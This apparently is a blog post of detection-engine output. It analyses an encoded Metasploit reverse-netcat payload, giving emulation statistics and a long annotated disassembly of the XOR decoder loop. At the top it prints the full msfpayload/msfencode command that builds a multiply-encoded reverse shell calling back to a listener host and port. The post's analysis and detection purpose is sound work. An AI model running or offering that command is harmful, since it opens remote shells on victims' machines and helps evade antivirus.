======== Payload investigation statistics ======== Payload generation command: #msfpayload cmd/unix/reverse_netcat LHOST=192.168.111.129 LPORT=9988 O | msfencode -e x86/shikata_ga_nai -c 9 -t raw| msfencode -e x86/countdown -c 7 -t raw Suspicios payload offset: 0 Emulation attribute name Value ======================================================= WRITES_TO_PROCESS_STACK_MEMORY 0 ------------------------------------------------------- BUFFER_INSIDE_WRITES_COUNT 48 ------------------------------------------------------- REFERENCES_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- BUFFER_OUTSIDE_WRITES_COUNT 0 ------------------------------------------------------- FAR_JUMPS_COUNT 0 ------------------------------------------------------- FULLY_INITIALIZED_INSTRUCTIONS 100 ------------------------------------------------------- PROVIDED_ABSOLUTE_MEMORY_ADDRESSES 1 ------------------------------------------------------- PROC_CALLS_INSIDE_INV_BUFFER 1 ------------------------------------------------------- BUFFER_OUTSIDE_READS_COUNT 1 ------------------------------------------------------- UNDEFINED_DIRECT_CALLS 0 ------------------------------------------------------- JUMPS_INSIDE_INV_BUFFER 48 ------------------------------------------------------- CORRECTLY_PARSED_INSTRUCTIONS 100 ------------------------------------------------------- MEMORY_MODIFYING_MATH_INSTRUCTIONS 0 ------------------------------------------------------- BUFFER_INSIDE_READS_COUNT 0 ------------------------------------------------------- SYSTEM_CALLS_COUNT 0 ------------------------------------------------------- UNRECOGNIZED_CALL_TARGETS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_IMPORTS 0 ------------------------------------------------------- CORRECT_PROCEDURES_CALLS 0 ------------------------------------------------------- EIP_RETRIEVAL_INSTRUCTIONS 0 ------------------------------------------------------- JUMPS_TO_PROCESS_INTERNALS 0 ------------------------------------------------------- EXECUTED_ARITHMETIC_INSTRUCTIONS 1 ------------------------------------------------------- CALLS_TARGETED_IMPORTS_SECTION 0 ------------------------------------------------------- UNRECOGNIZED_JUMP_TARGETS 0 ------------------------------------------------------- CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS 0 ------------------------------------------------------- REFERENCES_TO_PROCESS_EXPORTS 0 ------------------------------------------------------- EXECUTES_BITS_OPERATING_INSTRUCTIONS 0 ------------------------------------------------------- IMMEDIATE_OPERANDS_INSTRUCTIONS 0 ------------------------------------------------------- INDIRECT_BUFFER_REFERENCES 1 ------------------------------------------------------- MAX_WRITTEN_MEMORY_BLOCK 0 ------------------------------------------------------- CORRECTLY_EXECUTED_INSTRUCTIONS 100 ------------------------------------------------------- READS_FROM_PROCESS_STACK_MEMORY 1 ------------------------------------------------------- CALLS_TARGETED_EXPORTS_SECTION 0 ------------------------------------------------------- More about quttera investigation engine here
======== Detection disassembly ======== MOV ECX (0x00000000),0x00000369 CALL 0xBF9D2695 INC ECX (0x00000369) POP ESI (0x00000000) XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A07),CL (0x6A) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A06),CL (0x69) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A05),CL (0x68) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A04),CL (0x67) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A03),CL (0x66) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A02),CL (0x65) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A01),CL (0x64) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A00),CL (0x63) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FF),CL (0x62) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FE),CL (0x61) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FD),CL (0x60) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FC),CL (0x5F) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FB),CL (0x5E) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FA),CL (0x5D) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F9),CL (0x5C) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F8),CL (0x5B) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F7),CL (0x5A) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F6),CL (0x59) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F5),CL (0x58) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F4),CL (0x57) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F3),CL (0x56) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F2),CL (0x55) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F1),CL (0x54) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F0),CL (0x53) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EF),CL (0x52) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EE),CL (0x51) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29ED),CL (0x50) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EC),CL (0x4F) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EB),CL (0x4E) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EA),CL (0x4D) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E9),CL (0x4C) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E8),CL (0x4B) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E7),CL (0x4A) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E6),CL (0x49) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E5),CL (0x48) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E4),CL (0x47) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E3),CL (0x46) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E2),CL (0x45) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E1),CL (0x44) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E0),CL (0x43) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DF),CL (0x42) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DE),CL (0x41) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DD),CL (0x40) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DC),CL (0x3F) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DB),CL (0x3E) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DA),CL (0x3D) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D9),CL (0x3C) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D8),CL (0x3B) ;investigation buffer write instruction [suspicious memory write instruction] LOOP 0xFA ;random read instruction
No comments:
Post a Comment